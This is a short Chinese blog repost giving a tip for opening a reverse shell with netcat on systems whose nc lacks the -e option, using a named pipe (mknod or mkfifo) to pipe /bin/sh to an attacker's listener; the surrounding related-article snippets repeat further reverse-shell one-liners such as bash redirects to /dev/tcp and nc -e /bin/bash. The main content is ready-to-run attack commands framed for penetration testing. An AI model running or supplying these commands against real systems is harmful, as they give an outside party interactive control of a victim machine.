[TIP]NC不使用-e选项反弹shell

最新推荐文章于 2024-02-18 22:30:57 发布
最新推荐文章于 2024-02-18 22:30:57 发布
阅读量817 收藏
点赞数
文章标签: shell
原文链接:https://yq.aliyun.com/articles/519525
版权

【转自】http://www.2cto.com/article/201305/209914.html


攻击方执行:

1
nc -lnvp 4430

被攻击方执行:

1
2
mknod  /tmp/backpipe  p
/bin/sh  0< /tmp/backpipe  | nc 192.168.xx.xx 4430 1> /tmp/backpipe

网上查了下mknod命令,说是只能root用户才有权限执行,可是经过测试普通权限的用户也可以创建管道等特殊文件,如果没有权限使用mkfifo /tmp/backpipe也可以创建一个管道。









本文转自fatshi51CTO博客,原文链接: http://blog.51cto.com/duallay/1887544,如需转载请自行联系原作者











weixin_34315189
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
linux反弹shell的原理详解
01-08
完整命令 反弹shell命令: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 bash -i > /dev/tcp/ip/port 0>&1 2>&1 利用nc反弹shellnc -lvvp 12345 -t -e /bin/bash 原理 bash -i > /dev/tcp/ip/port 0>&1 2>&1 bash -i 打开一个交互式的bash &是为了区分文件1和文件描述符1的 a>&b 的意思是 a>b 2>&1 0代表输入 ,0>&1 意思是,将输出的窗口上所输入的值当作当前窗口的输入。反弹shell后会有两个窗口,即靶机的shell窗口
NC使用-e选项反弹shell
weixin_34352449的博客
06-25 2360
对于瑞士×××nc我们再熟悉不过了,经常被用来进行数据包发送,文件传送以及反弹shell。在***测试过程中如果想反弹shell我们通常的做法是:Attacker: nc -lnvp listenportVictim: nc attackerip listenport -e /bin/sh在Linux的大部分发行版中都默认编译了nc,但也许是出于安全考虑,发行版中默认编译的n...
反弹shell初识
无痕的博客
11-01 3884
反弹shell的指令与演示
反弹Shell原理与实现
m0_62451321的博客
11-14 2967
Windows作为攻击者主机,Linux是被入侵主机(目标主机),此时目标主机上只要能正常运行Linux命令便可以实现反弹,利用Linux的Bash命令重定向和Windows上的Netcat应用程序,如果没有,则网络下载netcat应用程序即可。远程桌面,Web服务,SSH,SMB等等,都是正向连接。(3)对于病毒,木马,受害者什么时候能中招,对方的网络环境是什么样的,什么时候开关机,都是未知,所以建立一个服务端,让恶意程序主动连接,才是上策。(1)某客户机中了你的木马,但是它在局域网内,你直接连接不了。
反弹shell总结
weixin_44576725的博客
04-26 4372
反弹shell 在介绍反弹链接的时候先说明什么是正向链接:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面,web服务,ssh,telnet等等,都是正向连接。而反弹shell是指攻击者指定服务端,受害者主机主动连接攻击者的服务端程序,就叫反弹连接。本质上是网络概念的客户端与服务端的角色反转。反弹shell简单来说就是通过命令让靶机的shell的控制权交到攻击者的机器中。 可能有人会问:我们都能够在靶机
商业编程-源码-Shell编程源代码 infotip.zip
06-21
商业编程-源码-Shell编程源代码 infotip.zip
tiptop TOPGP-5.3数据字典.chm
06-01
鼎捷ERP tiptop TOPGP5.3数据库字典
TIPTOP GP5.3-MPS
05-16
TIPTOP GP5.3-MPS system management
TIPTOP底层脚本-进阶技转
10-22
TIPTOP底层脚本-进阶技转,shell脚本,sql脚本,订制脚本
TIPTOP-ERP-内部技术移转.pptx
06-24
TIPTOP-ERP-内部技术移转.pptx
nc使用+反弹shell
最新发布
2301_80366980的博客
02-18 569
记录学习linux中nc使用,以及反弹shell仅供个人学习,如有冒犯请尽快联系。
反弹shell从入门到进阶
飞鱼的企鹅的博客
10-14 310
前言 在渗透测试过程中,反弹shell是获取到权限的一种很重要的方式,一直用那些反弹shell的命令却不知道是什么意思,现在来专门学习一下原理。 什么是反弹shell 反弹shell(reverse shell),就是监控端在监控某TCP/UDP端口,被控制端使用漏洞或其他方法发起请求到该端口,并将其命令行的输入输出转到控制端。 为什么要反弹shell 当我们已经打开了被攻击机的相应端口,如22,...
反弹shell原理
Monica的博客
11-01 2307
原理 反弹shell(reverse shell),就是攻击端(本机)监听在某TCP/UDP端口,受害端(目标服务器)发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 实验案例 实验环境: 攻击端:mac ip地址:192.168.57.252 受害端:kali linux ip地址:10.211.5519 nc反弹: 攻击端mac终端输入: nc ...
关于nc无法使用-e参数 nc:invalid option -- ‘e’
tonine9的博客
07-24 3270
关于nc无法使用-e参数,解决方法。安装之后,由于ubuntu默认安装的是netcat-openbsd,选择/bin/nc.traditional的编号。nc老版本是不能采用-e这个参数的。
NC不用-e建立TCP/UDP 反弹连接shell
zhang35的博客
04-26 1263
主机1监听端口,主机2发起连接。 TCP shell 主机1: nc -nvlp 4444 主机2: /bin/sh 0</tmp/backpipe | nc 主机1的IP 4444 1>/tmp/backpipe UDP shell 攻击机: nc -nuvlp 4444 靶机: mkfifo fifo nc -u 主机1的IP 4444 < fifo | { ec...
各种反弹shell原理
haoge1998的博客
04-18 1万+
各种反弹shell原理 一、理解反弹shell 1、为什么需要反弹shell 当正向连接不可达时候 客户机中了木马,但是在局域网内,无法正向连接。 由于防火墙和局域网的限制,对方只能发送请求,不可主动接受请求 2、原理 反弹shell:控制端监听某个端口,被控制端发起请求到该端口,并将命令行的输入输出传到控制端 二、常用的反弹shell命令 1、bash进行反弹 (1)在windows上启动监听端口 nc -lvp 4444 l:代表入站监听 v:代表输出信息级别 p:代表监听的端口 (2)在Lin
nc反弹php,NC使用-e选项反弹shell
weixin_31108679的博客
04-12 642
对于瑞士×××nc我们再熟悉不过了,经常被用来进行数据包发送,文件传送以及反弹shell。在***测试过程中如果想反弹shell我们通常的做法是:Attacker: nc -lnvp listenportVictim: nc attackerip listenport -e /bin/sh在Linux的大部分发行版中都默认编译了nc,但也许是出于安全考虑,发行版中默认编译的nc往往没有-e选项(没...
【安全】反弹Shell的原理及18般利用姿势
qqchaozai的专栏
12-29 2012
前言 shell:一种用来执行操作系统指令的程序 反弹shell (reverse shell):一种让远程系统执行本地shell的程序。 1 原理 远程系统监听一个TCP/UDP端口,本地系统运行反弹shell反弹shell会连接该端口,并接收远程系统发送的shell指令,执行之后再将指令的输出流转发给远程系统。 1.1文件描述符 ...
linux反弹shell的原理
热门推荐
Shanfenglan's blog
08-24 27万+
完整命令 反弹shell命令: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 bash -i > /dev/tcp/ip/port 0>&1 2>&1 利用nc反弹shellnc -lvvp 12345 -t -e /bin/bash 原理 bash -i > /dev/tcp/ip/port 0>&1 2>&1 bash -i 打开一个交互式的bash &是为了
wxwidget下拉列表中每个选项提供Tip
07-12
在 wxWidgets 中,可以通过使用 wxComboBox 控件和 wxToolTip 来为下拉列表中的每个选项提供 Tip。下面是一个示例代码: ```cpp // 创建一个 wxComboBox 对象 wxComboBox* comboBox = new wxComboBox(this, wxID_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值